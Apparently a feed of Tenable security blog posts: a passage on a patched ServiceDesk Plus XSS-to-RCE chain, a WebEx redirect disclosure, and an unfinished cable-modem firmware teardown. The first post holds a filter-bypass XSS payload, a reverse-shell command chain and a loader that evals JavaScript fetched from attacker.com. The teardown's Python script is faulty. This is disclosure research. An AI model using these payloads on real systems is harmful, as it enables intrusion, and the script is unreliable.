The problem here is that a CSRF token is also in play. For example, if a user were to be deleted, the following request would fire.

DELETE /api/v3/users?ids=9 HTTP/1.1
Host: 172.26.31.177:8080
Content-Length: 160
Cache-Control: max-age=0
Accept: application/json, text/javascript, */*; q=0.01
X-ZCSRF-TOKEN: sdpcsrfparam=07b3f63e7109455ca9e1fad3871e92feb7aa22c086d43e0dfb3f09c0e9d77163481dc8e914422808f794c020c6e9e93fc0f9de633dab681eefe356bb9d18a638
X-Requested-With: XMLHttpRequest
If-Modified-Since: Thu, 1 Jan 1970 00:00:00 GMT
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://172.26.31.177:8080
Referer: http://172.26.31.177:8080/SetUpWizard.do?forwardTo=requester&viewType=list
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: SDPSESSIONID=DC6B4FDF88491030FD4CE332509EE267; JSESSIONIDSSO=167646B5D793A91BC5EA12C1CAB9BEAB; PORTALID=1; sdpcsrfcookie=07b3f63e7109455ca9e1fad3871e92feb7aa22c086d43e0dfb3f09c0e9d77163481dc8e914422808f794c020c6e9e93fc0f9de633dab681eefe356bb9d18a638; _zcsr_tmp=07b3f63e7109455ca9e1fad3871e92feb7aa22c086d43e0dfb3f09c0e9d77163481dc8e914422808f794c020c6e9e93fc0f9de633dab681eefe356bb9d18a638; memarketing-_zldp=Mltw9Iqq5RScV1w4XmHqtfyjDzbcGg%2Fgj2ZFSsChk9I%2BFeA4HQEbmBi6kWOCHoEBmdhXfrM16rA%3D; memarketing-_zldt=35fbbf7a-4275-4df4-918f-78167bc204c4-0
Connection: close
sdpcsrfparam=07b3f63e7109455ca9e1fad3871e92feb7aa22c086d43e0dfb3f09c0e9d77163481dc8e914422808f794c020c6e9e93fc0f9de633dab681eefe356bb9d18a638&SUBREQUEST=XMLHTTP

Notice the use of the ‘X-ZCSRF-TOKEN’ header and the ‘sdpcsrfparam’ request parameter. The token value is also passed in the ‘sdpcsrfcookie’ and ‘_zcsr_tmp’ cookies. This means subsequent requests won’t succeed unless we set the proper CSRF headers and cookies.

However, when the CSRF cookies are set, they do not set the HttpOnly flag. Because of this, our malicious JavaScript can harvest the value of the CSRF token in order to provide the required headers and request data.

Putting it all together, we are able to send an XMLHttpRequest:

  • with the proper session cookie values
  • and with the required CSRF token values.

No Spaces Allowed

Another fun roadblock was the fact that spaces couldn’t be included in the IP address. If we were to specify the line with “AN IP” as the IP address:

inet AN IP netmask 0xffffff00 broadcast 192.168.0.255

The JavaScript function would be generated as such:

function clickToExpandIP(){
jQuery('#ips').text('[ AN ]');
}

Notice that ‘IP’ was truncated. This is due to the way that ServiceDesk Plus parses the IP address field. It expects an IP address followed by a space, so the “IP” text would be truncated in this case.

However, this can be bypassed using multiline comments to replace spaces.

');}{var/**/text="stillxss";alert(text);//

Putting these pieces together, this means when we exploit the XSS, and the administrator views our malicious asset, we can fire valid (and complex) application requests with administrative privileges. In particular, I ended up abusing the custom scheduled task feature.

Code Execution via a Malicious Custom Schedule

Being an IT service desk software, ManageEngine ServiceDesk Plus has loads of functionality. Similar to other IT software out there, it allows you to create custom scheduled tasks. Also similar to other IT software, it lets you run system commands. With powerful functionality, there is a fine line separating a vulnerability and a feature that simply works as designed. In this case, there is a clear vulnerability (CVE-2021–20081).

Custom Schedule Screen

Above I have pasted a screen shot of the form that allows an administrator to create a custom schedule. Notice the executor example in the Action section. This allows the administrator to run a command on a scheduled basis.

Dangerous, yes. A vuln? Not yet. It’s by design.

What happens if the administrator wants to write some text to the file system using this feature?

Administrator attempts to write to C:\test.txt

Interestingly, “echo” is a restricted word. Clearly a filter is in place to deny this word, probably for cases like this. After some code review, I found an XML file defining a list of restricted words.

C:\Program Files\ManageEngine\ServiceDesk\conf\Asset\servicedesk.xml:

<GlobalConfig globalconfigid="GlobalConfig:globalconfigid:2600" category="Execute_Script" parameter="Restricted_Words" paramvalue="outfile,Out-File,write,echo,OpenTextFile,move,Move-Item,move,mv,MoveFile,del,Remove-Item,remove,rm,unlink,rmdir,DeleteFile,ren,Rename-Item,rename,mv,cp,rm,MoveFile" description="Script Restricted Words"/>

Notice the word “echo” and a bunch of other words that all seem to relate to file system operations. Clearly the developer did not want to allow a custom scheduled task to explicitly modify files.

If we look at com.adventnet.servicedesk.utils.ServiceDeskUtil.java, we can see how the filter is applied.

public String[] getScriptRestrictedWords() throws Exception {
String restrictedWords = GlobalConfigUtil.getInstance().getGlobalConfigValue("Restricted_Words", "Execute_Script");
return restrictedWords.split(",");
}
public Set containsScriptRestrictedWords(String input) throws Exception {
HashSet<String> input_words = new HashSet<String>();
input_words.addAll(Arrays.asList(input.split(" ")));
input_words.retainAll(Arrays.asList(this.getScriptRestrictedWords()));
return input_words;
}

Most notably, the command line input string is split into words using a space character as a delimiter.

input_words.addAll(Arrays.asList(input.split(" ")));

This method of blocking commands containing restricted words is simply inadequate, and this is where the vulnerability comes into play. Let me show you how this filter can be bypassed.

One bypass for this involves the use of commas (or semicolons) to delimit the arguments of a command. For example, all of these commands are equivalent.

c:\>echo "Hello World"
"Hello World"
c:\>echo,"Hello World"
"Hello World"
c:\>echo;"Hello World"
"Hello World"

With this in mind, an administrator could craft a command with commas to write to disk. For example:

cmd /c "echo,testing > C:\\test.txt"

Even better, the command will execute with NT AUTHORITY\SYSTEM privileges. Sysinternals Process Monitor will prove that:

Pop a Shell

I opted for a Java-based reverse shell since I knew a Java executable would be shipped with ServiceDesk Plus. It is written in Java, after all. The command line contains the following logic.

I first used ‘echo’ to write out a Base64-encoded Java class.

echo,<Base64 encoded Java reverse shell class>> b64file

After that I used ‘certutil’ to decode the data into a functioning Java class. Thanks to Casey Dunham for the awesome Java reverse shell.

certutil -f -decode b64file ReverseTcpShell.class

And finally, I used the provided Java executable to launch a reverse shell that connects back to the attacker’s listener at IP:port.

C:\\PROGRA~1\\ManageEngine\\ServiceDesk\\jre\\bin\\java.exe ReverseTcpShell <attacker ip> <attacker port>

Chaining these Together

From a high level, an exploit chain looks like the following:

  1. Send an XML asset file to SDP containing our malicious JavaScript code.
  2. After a short period of time, SDP will process the XML file and add the asset.
  3. When the administrator views the asset, the JavaScript fires. This can be encouraged by sending a link to the administrator.
  4. The JavaScript will create a malicious custom scheduled task to execute in 1 minute.
  5. After one minute, the scheduled task executes, and a reverse shell connects back to the attacker’s machine.

This is the basic overview of a full exploit chain. However, there was a wrench thrown in that I’d like to mention. Namely, there was a maximum length enforced. Due to the length of a reverse shell payload, this restriction required me to use a staged approach.

Let me show you.

Staging the Custom Schedule

In order to solve this problem, I set up an HTTP listener that, when contacted by my XSS payload, would send more JavaScript code back to the browser. The XSS would then call eval() on this code, thereby loading another stage of JavaScript code.

So basically, the initial XSS payload contains enough code to reach out to the attacker’s HTTP server, and downloads another stage of JavaScript to be executed using eval(). Something like this:

function loaded() {
eval(this.responseText);
}
var req = new XMLHttpRequest();
req.addEventListener("load", loaded);
req.open("GET","http://attacker.com/more_js");
req.send(null);

Once the JavaScript downloads, the loaded() function fires. The one catch is that since we’re in the browser, a CORS header needs to be set by the attacker’s listener:

Access-Control-Allow-Origin: *

This will tell the browser it’s okay to load the attacker server’s content in the ServiceDesk Plus application, since they’re cross-origin. Using this strategy, a massive chunk of JavaScript can be loaded. With all of this in mind, a full exploit can be constructed like so:

  1. Send an XML asset file to SDP containing our malicious JavaScript code.
  2. After a short period of time, SDP will process the XML file and add the asset.
  3. When the administrator views the asset, the JavaScript fires. This can be encouraged by sending a link to the administrator.
  4. The XSS will download more JavaScript from the attacker’s HTTP server.
  5. The downloaded JavaScript will create a malicious custom scheduled task to execute in 1 minute.
  6. After one minute, the scheduled task executes, and a reverse shell connects back to the attacker’s machine.

Let’s see all of this in action:

https://www.youtube.com/watch?v=DhrJxVqmsIo

Wrapping Up

We’ve now seen how an unauthenticated attacker can exploit a cross-site scripting vulnerability to gain remote code execution in ManageEngine ServiceDesk Plus. As I said earlier, David Wells has managed to exploit a heap overflow in the AssetExplorer agent software. If you’re an SDP or AssetExplorer server administrator, this is the agent software that you would distribute to assets on the network. This vulnerability would allow an attacker to pivot from SDP to agents. As you might imagine this is a dangerous attack scenario.

ManageEngine did a solid job of patching. I reported the bugs on March 17, 2021. The XSS was patched by April 07, 2021, and the RCE was patched by June 1, 2021. That’s a fast turnaround!

For more detailed information on the vulnerabilities, take a look at our research advisories: TRA-2021–11 and TRA-2021–22.


Stored XSS to RCE Chain as SYSTEM in ManageEngine ServiceDesk Plus was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Cisco WebEx Universal Links Redirect

What’s dumber than an open redirect? This.

The following is a quick and dirty companion write-up for TRA-2021–34. The issue described has been fixed by the vendor.

After being forced to use WebEx a little while back, I noticed that the URIs and protocol handlers for it on macOS contained more information than you typically see, so I decided to investigate. There are a handful of valid protocol handlers for WebEx, but the one I’ll reference for the rest of this blog is “webexstart://”.

When you visit a meeting invite for any of the popular video chat apps these days, you typically get redirected to some sort of launchpad webpage that grabs the meeting information behind the scenes and then makes a request using the appropriate protocol handler in the background, which is then used to launch the corresponding application. This is generally a pretty seamless and straightforward process for end-users. Interrupting this process and looking behind the scenes, however, can give us a good look at the information required to construct this handler. A typical protocol handler constructed for Cisco WebEx looks like this:

webexstart://launch/V2ViRXhfbWNfbWVldDExMy1lbl9fbWVldDExMy53ZWJleC5jb21fZXlKMGIydGxiaUk2SW5CRVVGbDFUSHBpV0ZjaUxDSmtiM2R1Ykc5aFpFOXViSGtpT21aaGJITmxMQ0psYm1GaWJHVkpia0Z3Y0VwdmFXNGlPblJ5ZFdVc0ltOXVaVlJwYldWVWIydGxiaUk2SWlJc0lteGhibWQxWVdkbFNXUWlPakVzSW1OdmNuSmxiR0YwYVc5dVNXUWlPaUpqTVRnd1kyVXlNQzFtTWpKaExUUTFZamt0T1RFd09TMDVZVFk1TlRRelpHTmlOREVpTENKMGNtRmphMmx1WjBsRUlqb2lkMlZpWlhndGQyVmlMV05zYVdWdWRGOWpNemRsTkdFMVlTMHpPRGxtTFRRek1qZ3RPVEl5WlMwM1lqTTBaREl4TTJZeVpUQmZNVFl5TXpnMk5EQXhOell3TlNJc0ltTmtia2h2YzNRaU9pSmhhMkZ0WVdsalpHNHVkMlZpWlhndVkyOXRJaXdpY21WbmRIbHdaU0k2SWpFeUpUZzJJbjA9\/V2?t=99999999999999&t1=%URLProtocolLaunchTime%&[email protected]&p=eyJ1dWlkIjoiNGVjYjdlNTJhODI3NGYzN2JlNDFhZWY1NTMxZDg3MmMiLCJjdiI6IjQxLjYuNC44IiwiY3dzdiI6IjExLDQxLDA2MDQsMjEwNjA4LDAiLCJzdCI6Ik1DIiwibXRpZCI6Im02NjkyMGNlNzJkMzYwMGEyNDZiMWUxMGE4YWY5MmJkNyIsInB2IjoiVDMzXzY0VU1DIiwiY24iOiJBVENPTkZVSS5CVU5ETEUiLCJmbGFnIjozMzU1NDQzMiwiZWpmIjoiMiIsImNwcCI6ImV3b2dJQ0FnSW1OdmJXMXZiaUk2SUhzS0lDQWdJQ0FnSUNBaVJHVnNZWGxTWldScGNtVmpkQ0k2SUNKMGNuVmxJZ29nSUNBZ2ZTd0tJQ0FnSUNKM1pXSmxlQ0k2SUhzS0lDQWdJQ0FnSUNBaVNtOXBia1pwY25OMFFteGhZMnRNYVhOMElqb2dXd29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJalF4TGpRaUxBb2dJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lqUXhMalVpQ2lBZ0lDQWdJQ0FnWFFvZ0lDQWdmU3dLSUNBZ0lDSmxkbVZ1ZENJNklIc0tDaUFnSUNCOUxBb2odJQ0FnSW5SeVlXbHVhVzVuSWpvZ2V3b0tJQ0FnSUgwc0NpQWdJQ0FpYzNWd2NHOXlkQ0k2SUhzS0lDQWdJQ0FnSUNBaVIzQmpRMjl0Y0c5dVpXNTBUbUZ0WlNJNklDSkRhWE5qYnlCWFpXSmxlQ0JUZFhCd2IzSjBMbUZ3Y0NJS0lDQWdJSDBLZlFvPSIsInVsaW5rIjoiYUhSMGNITTZMeTl0WldWME1URXpMbmRsWW1WNExtTnZiUzkzWW5odGFuTXZhbTlwYm5ObGNuWnBZMlV2YzJsMFpYTXZiV1ZsZERFeE15OXRaV1YwYVc1bkwzTmxkSFZ3ZFc1cGRtVnljMkZzYkdsdWEzTS9jMmwwWlhWeWJEMXRaV1YwTVRFekptMWxaWFJwYm1kclpYazlNVGd5TWpnMk5qTTBOeVpqYjI1MFpYaDBTVVE5YzJWMGRYQjFibWwyWlhKellXeHNhVzVyWHpBek16azFZamN3WmpjMU1UUmpPR1U0TTJJek5qZ3lNV1V4T1dZd05UVXlYekUyTWpNNU5UQTBNVGMzTURZbWRHOXJaVzQ5VTBSS1ZGTjNRVUZCUVZoWVlqVkVMVTFtTUZKZlVXcHFka3BTWkdacmJFRmFZVzkxY1Voa1RYbHVjSFppWHpCS1IyeFJhVEYzTWlac1lXNW5kV0ZuWlQxbGJsOVZVdz09IiwidXRvZ2dsZSI6IjEiLCJtZSI6IjEiLCJqZnYiOiIxIiwidGlmIjoiUEQ5NGJXd2dkbVZ5YzJsdmJqMGlNUzR3SWlCbGJtTnZaR2x1WnowaVZWUkdMVGdpUHo0S1BGUmxiR1ZOWlhSeWVVbHVabTgrUEUxbGRISnBZM05GYm1GaWJHVStNVHd2VFdWMGNtbGpjMFZ1WVdKc1pUNDhUV1YwY21samMxVlNURDVvZEhSd2N6b3ZMM1J6WVRNdWQyVmlaWGd1WTI5dEwyMWxkSEpwWXk5Mk1Ud3ZUV1YwY21samMxVlNURDQ4VFdWMGNtbGpjMUJoY21GdFpYUmxjbk0rUEUxbGRISnBZM05VYVdOclpYUStVbnBJTHk5M1FVRkJRVmhqUkhCSlFTOVFja0ZWSzJGeWFXTnliVEF3TlRjMVpubFZUM0EwVFc4d1NrTnpWVXh0V2pKR1IyTkJQVDA4TDAxbGRISnBZM05VYVdOclpYUStQRU52Ym1aSlJENHhPVGN4T1RnME5UYzBNakkzTnpJek5EYzhMME52Ym1aSlJENDhVMmwwWlVsRVBqRTBNakkyTXpZeVBDOVRhWFJsU1VRK1BGUnBiV1ZUZEdGdGNENHhOakl6T0RZME1ERTNOekEzUEM5VWFXMWxVM1JoYlhBK1BFRlFVRTVoYldVK1UyVnpjMmx2Ymt0bGVUd3ZRVkJRVG1GdFpUNDhMMDFsZEhKcFkzTlFZWEpoYldWMFpYSnpQanhOWlhSeWFXTnpSVzVoWW14bFRXVmthV0ZSZFdGc2FYUjVSWFpsYm5RK01Ud3ZUV1YwY21samMwVnVZV0pzWlUxbFpHbGhVWFZoYkdsMGVVVjJaVzUwUGp3dlZHVnNaVTFsZEhKNVNXNW1iejQ9In0=

While there are several components to this URL, we’ll focus on the last one — ‘p’. ‘p’ is a base64 encoded string that contains settings information such as support app information, telemetry configurations, and the information required to set up Universal Links for macOS. When decoding the above, we can see that ‘p’ decodes to:

{“uuid”:”8e18fa93cd10432a907c94fb9d3a63e6",”cv”:”41.6.4.8",”cwsv”:”11,41,0604,210608,0",”st”:”MC”,”pv”:”T33_64UMC”,”cn”:”ATCONFUI.BUNDLE”,”flag”:33554432,”ejf”:”2",”cpp”:”ewogICAgImNvbW1vbiI6IHsKICAgICAgICAiRGVsYXlSZWRpcmVjdCI6ICJ0cnVlIgogICAgfSwKICAgICJ3ZWJleCI6IHsKICAgICAgICAiSm9pbkZpcnN0QmxhY2tMaXN0IjogWwogICAgICAgICAgICAgICAgIjQxLjQiLAogICAgICAgICAgICAgICAgIjQxLjUiCiAgICAgICAgXQogICAgfSwKICAgICJldmVudCI6IHsKCiAgICB9LAogICAgInRyYWluaW5nIjogewoKICAgIH0sCiAgICAic3VwcG9ydCI6IHsKICAgICAgICAiR3BjQ29tcG9uZW50TmFtZSI6ICJDaXNjbyBXZWJleCBTdXBwb3J0LmFwcCIKICAgIH0KfQo=”,”ulink”:”aHR0cHM6Ly9tZWV0MTEzLndlYmV4LmNvbS93YnhtanMvam9pbnNlcnZpY2Uvc2l0ZXMvbWVldDExMy9tZWV0aW5nL3NldHVwdW5pdmVyc2FsbGlua3M/c2l0ZXVybD1tZWV0MTEzJm1lZXRpbmdrZXk9MTgyMDIxMDYwOCZjb250ZXh0SUQ9c2V0dXB1bml2ZXJzYWxsaW5rXzNlNjNjZDFlODcyMzRlOTE4OWU2OWM2NjI2MDcxMzBiXzE2MjQwMjA4ODUwNTImdG9rZW49U0RKVFN3QUFBQVd4c0pGelhzSW1Da2l3aHQya2t4TE1WWFdJVFZpTTh4OWVnUWJlejVUaWhBMiZsYW5ndWFnZT1lbl9VUw==”,”utoggle”:”1",”me”:”1",”jfv”:”1",”tif”:”PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz4KPFRlbGVNZXRyeUluZm8+PE1ldHJpY3NFbmFibGU+MTwvTWV0cmljc0VuYWJsZT48TWV0cmljc1VSTD5odHRwczovL3RzYTMud2ViZXguY29tL21ldHJpYy92MTwvTWV0cmljc1VSTD48TWV0cmljc1BhcmFtZXRlcnM+PE1ldHJpY3NUaWNrZXQ+UnpILy93QUFBQVVoVE5VSXhKcThuKzR4N0djY2c5S1NFRWFqVHZ2aDQrWkxLSmIzTnh3aElnPT08L01ldHJpY3NUaWNrZXQ+PENvbmZJRD4xOTczMDMyMzQxNzY1MTQ3NDE8L0NvbmZJRD48U2l0ZUlEPjE0MjI2MzYyPC9TaXRlSUQ+PFRpbWVTdGFtcD4xNjIzOTM0NDg1MDUyPC9UaW1lU3RhbXA+PEFQUE5hbWU+U2Vzc2lvbktleTwvQVBQTmFtZT48L01ldHJpY3NQYXJhbWV0ZXJzPjxNZXRyaWNzRW5hYmxlTWVkaWFRdWFsaXR5RXZlbnQ+MTwvTWV0cmljc0VuYWJsZU1lZGlhUXVhbGl0eUV2ZW50PjwvVGVsZU1ldHJ5SW5mbz4=”}

From this output, we have a parameter called ‘ulink’. Further decoding this parameter gets us:

https://meet113.webex.com/wbxmjs/joinservice/sites/meet113/meeting/setupuniversallinks?siteurl=meet113&meetingkey=1820210608&contextID=setupuniversallink_3e63cd1e87234e9189e69c662607130b_1624020885052&token=SDJTSwAAAAWxsJFzXsImCkiwht2kkxLMVXWITViM8x9egQbez5TihA2&language=en_US

This parameter corresponds to what’s known as “Universal Links” in the Apple ecosystem. This is the magical mechanism that allows certain URL patterns to automatically be opened with a preferred app. For example, if universal links were configured for Reddit on your iPhone, clicking any link starting with “reddit.com” would automatically open that link in the Reddit app instead of in the browser. The ‘ulink’ parameter above is meant to set up this convenience feature for WebEx.

The following image explains how this link travels through the WebEx application flow:

At no point in this flow is the ‘ulink’ parameter validated, sanitized, or modified in any way. This means that a given attacker could construct a fake WebEx meeting invite (whether through a malicious domain, or simply getting someone to click the protocol handler directly in Slack or some other chat app) and supply their own custom ‘ulink’ parameter.

For example, the following URL will open WebEx, and upon closing the application, Safari will be opened to https://tenable.com:

webexstart://launch/V2ViRXhfbWNfbWVldDExMy1lbl9fbWVldDExMy53ZWJleC5jb21fZXlKMGIydGxiaUk2SW5CRVVGbDFUSHBpV0ZjaUxDSmtiM2R1Ykc5aFpFOXViSGtpT21aaGJITmxMQ0psYm1GaWJHVkpia0Z3Y0VwdmFXNGlPblJ5ZFdVc0ltOXVaVlJwYldWVWIydGxiaUk2SWlJc0lteGhibWQxWVdkbFNXUWlPakVzSW1OdmNuSmxiR0YwYVc5dVNXUWlPaUpqTVRnd1kyVXlNQzFtTWpKaExUUTFZamt0T1RFd09TMDVZVFk1TlRRelpHTmlOREVpTENKMGNtRmphMmx1WjBsRUlqb2lkMlZpWlhndGQyVmlMV05zYVdWdWRGOWpNemRsTkdFMVlTMHpPRGxtTFRRek1qZ3RPVEl5WlMwM1lqTTBaREl4TTJZeVpUQmZNVFl5TXpnMk5EQXhOell3TlNJc0ltTmtia2h2YzNRaU9pSmhhMkZ0WVdsalpHNHVkMlZpWlhndVkyOXRJaXdpY21WbmRIbHdaU0k2SWpFeUpUZzJJbjA9/V2?t=99999999999999&t1=%URLProtocolLaunchTime%&[email protected]&p=eyJ1dWlkIjoiNGVjYjdlNTJhODI3NGYzN2JlNDFhZWY1NTMxZDg3MmMiLCJjdiI6IjQxLjYuNC44IiwiY3dzdiI6IjExLDQxLDA2MDQsMjEwNjA4LDAiLCJzdCI6Ik1DIiwibXRpZCI6Im02NjkyMGNlNzJkMzYwMGEyNDZiMWUxMGE4YWY5MmJkNyIsInB2IjoiVDMzXzY0VU1DIiwiY24iOiJBVENPTkZVSS5CVU5ETEUiLCJmbGFnIjozMzU1NDQzMiwiZWpmIjoiMiIsImNwcCI6ImV3b2dJQ0FnSUNBZ0lDSmpiMjF0YjI0aU9pQjdDaUFnSUNBZ0lDQWdJa1JsYkdGNVVtVmthWEpsWTNRaU9pQWlabUZzYzJVaUNpQWdJQ0I5TEFvZ0lDQWdJbmRsWW1WNElqb2dld29nSUNBZ0lDQWdJQ0pLYjJsdVJtbHljM1JDYkdGamEweHBjM1FpT2lCYkNpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBaU5ERXVOQ0lzQ2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FpTkRFdU5TSUtJQ0FnSUNBZ0lDQmRDaUFnSUNCOUxBb2dJQ0FnSW1WMlpXNTBJam9nZXdvS0lDQWdJSDBzQ2lBZ0lDQWlkSEpoYVc1cGJtY2lPaUI3Q2dvZ0lDQWdmU3dLSUNBZ0lDSnpkWEJ3YjNKMElqb2dld29nSUNBZ0lDQWdJQ0pIY0dORGIyMXdiMjVsYm5ST1lXMWxJam9nSWtOcGMyTnZJRmRsWW1WNElGTjFjSEJ2Y25RdVlYQndJZ29nSUNBZ2ZRb2dJQ0FnZlFvZ0lDQWciLCJ1bGluayI6ImFIUjBjSE02THk5MFpXNWhZbXhsTG1OdmJRPT0iLCJ1dG9nZ2xlIjoiMSIsIm1lIjoiMSIsImpmdiI6IjEiLCJ0aWYiOiJQRDk0Yld3Z2RtVnljMmx2YmowaU1TNHdJaUJsYm1OdlpHbHVaejBpVlZSR0xUZ2lQejQ4VkdWc1pVMWxkSEo1U1c1bWJ6NDhUV1YwY21samMwVnVZV0pzWlQ0d1BDOU5aWFJ5YVdOelJXNWhZbXhsUGp4TlpYUnlhV056VlZKTVBtaDBkSEJ6T2k4dmRITmhNeTUzWldKbGVDNWpiMjB2YldWMGNtbGpMM1l4UEM5TlpYUnlhV056VlZKTVBqeE5aWFJ5YVdOelVHRnlZVzFsZEdWeWN6NDhUV1YwY21samMxUnBZMnRsZEQ1U2VrZ3ZMM2RCUVVGQldHTkVjRWxCTDFCeVFWVXJZWEpwWTNKdE1EQTFOelZtZVZWUGNEUk5iekJLUTNOVlRHMWFNa1pIWTBFOVBUd3ZUV1YwY21samMxUnBZMnRsZEQ0OFEyOXVaa2xFUGpFNU56RTVPRFExTnpReU1qYzNNak0wTnp3dlEyOXVaa2xFUGp4VGFYUmxTVVErTVRReU1qWXpOakk4TDFOcGRHVkpSRDQ4VkdsdFpWTjBZVzF3UGpFMk1qTTROalF3TVRjM01EYzhMMVJwYldWVGRHRnRjRDQ4UVZCUVRtRnRaVDVUWlhOemFXOXVTMlY1UEM5QlVGQk9ZVzFsUGp3dlRXVjBjbWxqYzFCaGNtRnRaWFJsY25NK1BFMWxkSEpwWTNORmJtRmliR1ZOWldScFlWRjFZV3hwZEhsRmRtVnVkRDR4UEM5TlpYUnlhV056Ulc1aFlteGxUV1ZrYVdGUmRXRnNhWFI1UlhabGJuUStQQzlVWld4bFRXVjBjbmxKYm1adlBnPT0ifQ==

The following gif demonstrates this functionality.

It may also be possible for a specially crafted URL to contain modified domains used for telemetry data, debug information, or other configurable options, which could lead to possible information disclosures.

Now, obviously, I want to emphasize that this flaw is relatively complex as it requires user interaction and is of relatively low impact. For starters, this attack already requires an attacker to trick a user into visiting a malicious link (providing a fake meeting invite via a custom domain for example) and then allowing WebEx to launch from their browser. In this case, we already have an attacker getting someone to visit a possibly malicious link. In general, we wouldn’t report this sort of issue due to no security boundary being crossed; that’s too silly for even me to report. In this case, however, there is a security boundary being crossed in that we are able to force the victim to open a malicious link with a specific browser (Safari), which would allow an attacker to specially craft payloads for that target browser.

To clarify, this is a pretty lame, but fun bug. While it’s tantamount to getting a user to click something malicious in the first place, it does give an attacker more control over the endpoint they are able to craft payloads for.

Hopefully, you find it at least a little entertaining as well. :)


Cisco WebEx Universal Links Redirect was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

ARRIS CABLE MODEM TEARDOWN

Picked up one of these a little while back at the behest of a good friend.

https://www.surfboard.com/globalassets/surfboard-new/products/sb8200/sb8200-pro-detail-header-hero-1.png

It’s an Arris Surfboard SB8200 and is one of the most popular cable modems out there. Other than the odd CVE here and there and a confirmation that Cable Haunt could crash the device, there doesn’t seem to be much other research on these things floating around.

Well, unfortunately, that’s still the case, but I’d like it to change. Due to other priorities, I’ve gotta shelve this project for the time being, so I’m releasing this blog as a write-up to kickstart someone else that may be interested in tearing this thing apart, or at the very least, it may provide a quick intro to others pursuing similar projects.

THE HARDWARE

There are a few variations of this device floating around. My colleague, Nick Miles, and I each purchased one of these from the same link… and each received totally different versions. He received the CM8200a while I received the SB8200. They’re functionally the same but have a few hardware differences.

Since there isn’t any built-in wifi or other RF emission from these modems, we’re unable to rely on images pilfered from FCC-related documents and certification labs. As such, we’ve got to tear it apart for ourselves. See the following images for details.

Top of SB8200
Bottom of SB8200 (with heatsink)
Closeup of Flash Storage
Broadcom Chip (under heatsink)
Top of CM8200a

As can be seen in the above images, there are a few key differences between these two revisions of the product. The SB8200 utilizes a single chip for all storage, whereas the CM8200a has two chips. The CM8200a also has two serial headers (pictured at the bottom of the image). Unfortunately, these headers only provide bootlog output and are not interactive.

THE FIRMWARE

Arris states on its support pages for these devices that all firmware is to be ISP controlled and isn’t available for download publicly. After scouring the internet, I wasn’t able to find a way around this limitation.

So… let’s dump the flash storage chips. As mentioned in the previous section, the SB8200 uses a single NAND chip whereas the CM8200a has two chips (SPI and NAND). I had some issues acquiring the tools to reliably dump my chips (multiple failed AliExpress orders for TSOP adapters), so we’re relying exclusively on the CM8200a dump from this point forward.

Dumping the contents of flash chips is mostly a matter of just having the right tools at your disposal. Nick removed the chips from the board, wired them up to various adapters, and dumped them using Flashcat.

SPI Chip Harness
SPI Chip Connected to Flashcat
NAND Chip Removed and Placed in Adapter
Readout of NAND Chip in Flashcat

PARSING THE FIRMWARE

Parsing NAND dumps is always a pain. The usual stock tools did us dirty (binwalk, ubireader, etc.), so we had to resort to actually doing some work for ourselves.

Since consumer routers and such are notorious for having hidden admin pages, we decided to run through some common discovery lists. We stumbled upon arpview.cmd and sysinfo.cmd.

Details on sysinfo.cmd

Jackpot.

Since we know the memory layout is different on each of our sample boards (SB8200 above), we’ll need to use the layout of the CM8200a when interacting with the dumps:

Creating 7 MTD partitions on “brcmnand.1”:
0x000000000000–0x000000620000 : “flash1.kernel0”
0x000000620000–0x000000c40000 : “flash1.kernel1”
0x000000c40000–0x000001fa0000 : “flash1.cm0”
0x000001fa0000–0x000003300000 : “flash1.cm1”
0x000003300000–0x000005980000 : “flash1.rg0”
0x000005980000–0x000008000000 : “flash1.rg1”
0x000000000000–0x000008000000 : “flash1”
brcmstb_qspi f04a0920.spi: using bspi-mspi mode
brcmstb_qspi f04a0920.spi: unable to get clock using defaults
m25p80 spi32766.0: found w25q32, expected m25p80
m25p80 spi32766.0: w25q32 (4096 Kbytes)
11 ofpart partitions found on MTD device spi32766.0
Creating 11 MTD partitions on “spi32766.0”:
0x000000000000–0x000000100000 : “flash0.bolt”
0x000000100000–0x000000120000 : “flash0.macadr”
0x000000120000–0x000000140000 : “flash0.nvram”
0x000000140000–0x000000160000 : “flash0.nvram1”
0x000000160000–0x000000180000 : “flash0.devtree0”
0x000000180000–0x0000001a0000 : “flash0.devtree1”
0x0000001a0000–0x000000200000 : “flash0.cmnonvol0”
0x000000200000–0x000000260000 : “flash0.cmnonvol1”
0x000000260000–0x000000330000 : “flash0.rgnonvol0”
0x000000330000–0x000000400000 : “flash0.rgnonvol1”
0x000000000000–0x000000400000 : “flash0”

This info gives us pretty much everything we need: NAND partitions, filesystem types, architecture, etc.

Since stock tools weren’t playing nice, here’s what we did:

Separate Partitions Manually

Extract the portion of the dump we’re interested in looking at:

dd if=dump.bin of=rg1 bs=1 count=0x2680000 skip=0x5980000

Strip Spare Data

Strip spare data (also referred to as OOB data in some places) from each section. From chip documentation, we know that the page size is 2048 with a spare size of 64.

NAND storage has a few different options for memory layout, but the most common are: separate and adjacent.

From the SB8200 boot log, we have the following line:

brcmstb_nand f04a2800.nand: detected 128MiB total, 128KiB blocks, 2KiB pages, 16B OOB, 8-bit, BCH-4

This hints that we are likely looking at an adjacent layout. The following python script will handle stripping the spare data out of our dump.

import sys
data_area = 512
spare = 16
combined = data_area + spare
with open(‘rg1’, ‘rb’) as f:
dump = f.read()
count = int(len(dump) / combined)
out = b’’
for i in range(count):
out = out + dump[i*block : i*combined + data_area]
with open(‘rg1_stripped’, ‘wb’) as f:
f.write(out)

Change Endianness

From documentation, we know that the Broadcom chip in use here is Big Endian ARMv8. The systems and tools we’re performing our analysis with are Little Endian, so we’ll need to do some conversions for convenience. This isn’t a foolproof solution but it works well enough because UBIFS is a fairly simple storage format.

with open('rg1_stripped', 'rb') as f:
dump = f.read()
with open('rg1_little', 'wb') as f:
# Page size is 2048
block = 2048
nblocks = int(len(dump) / block)

